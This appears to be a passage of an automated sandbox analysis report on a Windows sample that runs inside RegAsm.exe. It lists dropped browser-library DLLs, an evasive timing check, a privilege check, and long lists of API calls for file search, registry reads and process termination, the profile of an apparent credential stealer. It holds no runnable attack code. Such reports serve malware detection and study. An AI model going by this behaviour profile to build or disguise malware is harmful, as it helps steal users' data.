                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeMemory allocated: 27E35210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\60lAWJYfsL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-18799
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-4710
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,2_2_0040DC49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004070C9 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_004070C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040194A FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,2_2_0040194A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404B50 SetEnvironmentVariableA,CreateSemaphoreA,GetLastError,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateFileMappingW,FindFirstFileA,FindClose,CreateEventA,SetEvent,ResetEvent,CreateEventA,SetEvent,ResetEvent,LocalAlloc,GetLastError,LocalFree,LocalFree,LocalAlloc,LocalFree,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,CreateFileMappingW,CloseHandle,OutputDebugStringA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,CreateWaitableTimerA,CreateSemaphoreA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,FindCloseChangeNotification,CreateMutexA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,GetLastError,ReleaseMutex,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,CreateFileMappingW,FindCloseChangeNotification,CreateWaitableTimerA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,CreateFileMappingW,CreateFileMappingW,FindCloseChangeNotification,CreateFileMappingW,RegOpenKeyExA,CloseHandle,LocalAlloc,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateMutexA,ReleaseMutex,LocalAlloc,RegOpenKeyExA,LocalFree,CreateFileMappingW,RegOpenKeyExA,FindCloseChangeNotification,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSem2_2_00404B50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409452 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,ReadFile,lstrlenA,StrStrA,lstrlenA,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,DeleteFileW,LocalFree,DeleteFileW,LocalFree,2_2_00409452
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410952 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_00410952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CA58 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_0040CA58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409ADC EntryPoint,LocalAlloc,LocalFree,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CoInitialize,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,SetEnvironmentVariableA,CancelWaitableTimer,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,ExitProcess,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,LocalAlloc,LocalFree,GetLastError,SetEnvironmentVariableA,CreateWaitableTimerA,GetLastError,GetLastError,OutputDebugStringA,CancelWaitableTimer,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,LocalAlloc,LocalFree,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,LocalAlloc,SetEnvironmentVariableA,LocalFree,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,GetLastError,FindCloseChangeNotification,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateFileMappingW,CloseHandle,CreateMutexA,ReleaseMutex,RegOpenKeyExA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,CreateMutexA,ReleaseMutex,LocalAlloc,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateEventA,SetEvent,ResetEvent,LocalAlloc,OutputDebugStringA,LocalFree,OutputDebugStringA,CreateFileMappingW,OutputDebugStringA,FindCloseChangeNotification,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,GetLastError,FindFirstFileA,FindClose,CreateWaitableTimerA,CreateWa2_2_00409ADC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004105DE LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,2_2_004105DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F4F1 CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateMutexA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateFileMappingW,CreateFileMappingW,CloseHandle,FindCloseChangeNotification,LocalAlloc,LocalFree,FindFirstFileA,LocalAlloc,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,OutputDebugStringA,CreateMutexA,ReleaseMutex,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,RegOpenKeyExA,RegOpenKeyExA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,RegQueryValueExW,RegQueryValueExW,2_2_0040F4F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040ED79 lstrlenA,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,LocalAlloc,MultiByteToWideChar,CreateFileMappingW,GetLastError,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalFree,OutputDebugStringA,SetEnvironmentVariableA,2_2_0040ED79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E179 CreateEventA,SetEvent,ResetEvent,CreateMutexA,RegOpenKeyExA,ReleaseMutex,GetLastError,RegOpenKeyExA,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,RegOpenKeyExA,LocalAlloc,OutputDebugStringA,LocalFree,SetEnvironmentVariableA,CreateFileMappingW,FindFirstFileW,FindFirstFileW,2_2_0040E179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EB7B CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,SetEnvironmentVariableA,FindFirstFileA,FindClose,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalFree,2_2_0040EB7B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F788 LocalAlloc,GetLastError,GetLastError,LocalFree,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateFileMappingW,RegOpenKeyExA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,FindFirstFileA,FindClose,LocalAlloc,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,GetLastError,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateFileMappingW,GetLastError,CloseHandle,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,LocalFree,RegOpenKeyExA,GetLastError,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,StrCpyW,LocalFree,2_2_0040F788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408109 OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,2_2_00408109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E48D OutputDebugStringA,CreateWaitableTimerA,CreateSemaphoreA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,LocalAlloc,LocalFree,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,CreateWaitableTimerA,LocalAlloc,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,GetLastError,FindFirstFileA,FindClose,SetEnvironmentVariableA,CreateFileMappingW,CloseHandle,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,LocalFree,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,CreateMutexA,RegOpenKeyExA,ReleaseMutex,SetEnvironmentVariableA,SHGetFolderPathW,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,StrCpyW,LocalFree,LocalFree,2_2_0040E48D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F012 CancelWaitableTimer,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,CreateFileMappingW,FindCloseChangeNotification,LocalAlloc,GetLastError,GetLastError,LocalFree,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateEventA,SetEvent,ResetEvent,CreateMutexA,SetEnvironmentVariableA,SetEnvironmentVariableA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateMutexA,ReleaseMutex,RegOpenKeyExA,LocalAlloc,GlobalFree,2_2_0040F012
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC1E CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,SetEnvironmentVariableA,CloseHandle,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,SetEnvironmentVariableA,GetLastError,CancelWaitableTimer,GetLastError,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,Process32FirstW,lstrcmpiW,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,LocalAlloc,OutputDebugStringA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,GetLastError,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,CreateMutexA,ReleaseMutex,GetLastError,SetEnvironmentVariableA,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,Process32FirstW,CloseHandle,2_2_0040FC1E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403E9F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_00403E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004087AA LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,2_2_004087AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004041AD StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004041AD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004017B3 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,2_2_004017B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F23A lstrlenA,lstrlenA,lstrlenA,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,GetLastError,CloseHandle,OutputDebugStringA,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,RegOpenKeyExA,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,LocalAlloc,LocalFree,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,CloseHandle,GetLastError,GetLastError,CreateMutexA,GetLastError,ReleaseMutex,FindFirstFileA,FindClose,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,SetEnvironmentVariableA,GlobalFree,2_2_0040F23A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403BE6 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_00403BE6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004084FB LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_004084FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040392D LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,2_2_0040392D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00407938 LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_00407938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E83D CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,LocalAlloc,lstrlenW,LocalAlloc,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateFileMappingW,OutputDebugStringA,CloseHandle,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,SetEnvironmentVariableA,LocalFree,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,lstrlenW,StrCpyW,LocalFree,StrCpyW,LocalFree,2_2_0040E83D
